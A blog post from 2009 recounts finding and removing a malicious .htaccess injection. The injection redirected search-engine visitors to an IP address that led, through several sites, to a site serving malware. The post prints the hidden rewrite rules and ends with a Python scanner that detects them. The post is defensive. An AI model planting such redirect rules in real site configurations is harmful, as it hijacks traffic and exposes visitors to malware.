Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic

Posted on Jan 14, 2009 in Security, Web Development

A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.

I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]

These lines were preceded by a couple of dozen blank lines, so that to most users checking .htaccess the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh, to check the file).

Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines) – that is, any request whose Referer header matches one of those names – and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).

Using a combination of traceroute and the Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script that redirects through a string of sites – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info Page), which installs a cookie: av_inst=880147 (an arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains malware, which I presume does something nasty, although I felt no inclination to investigate further!

Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly back to normal, receiving the search engine traffic it should.

So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
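As an added example that is not part of the original post: a small Python check for exactly the pattern described above (RewriteCond lines on HTTP_REFERER naming search engines, a RewriteRule sending those visitors to a bare IP address, and a run of blank lines hiding it all). The scanner, the Finding type and the SAMPLE .htaccess are my own construction; the only value taken from the post is the 89.28.13.201 redirect target.

```python
import re
from dataclasses import dataclass

# Engine names the injected conditions matched on (taken from the post).
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
IP_TARGET_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[/:?]|$)", re.I)  # off-site, bare IPv4 host
@dataclass
class Finding:
    rule_line: int      # 1-based line of the suspicious RewriteRule
    target: str         # where matched visitors are sent
    engines: tuple      # search engines named in the preceding RewriteConds
    leading_blank: int  # blank lines before the first directive (the hiding trick)

def scan_htaccess(text: str) -> list:
    """Heuristic (not an Apache parser): flag RewriteRules guarded by referer
    conditions naming search engines and redirecting to a bare IP address."""
    lines = text.splitlines()
    leading_blank = 0
    for line in lines:
        if line.strip():
            break
        leading_blank += 1
    findings, pending = [], []  # pending: engines named since the last RewriteRule
    for num, line in enumerate(lines, 1):
        cond = COND_RE.match(line)
        if cond:
            pending += [e for e in SEARCH_ENGINES if e in cond.group(1).lower()]
            continue
        rule = RULE_RE.match(line)
        if rule:
            target = rule.group(1)
            if pending and IP_TARGET_RE.match(target):
                findings.append(Finding(num, target, tuple(dict.fromkeys(pending)), leading_blank))
            pending = []  # a RewriteRule consumes the conditions above it
    return findings

# Constructed sample: 24 hiding blank lines, a benign www-canonicalisation rule, then the hijack.
SAMPLE = "\n" * 24 + """RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
"""
if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE):
        print(f"line {f.rule_line}: {f.engines} -> {f.target} ({f.leading_blank} leading blank lines)")
```

The benign canonicalisation rule is deliberately not flagged; only a rule whose conditions name a search engine and whose target is a bare IP is reported, together with the count of blank lines that would push it out of view in an editor.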


Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.
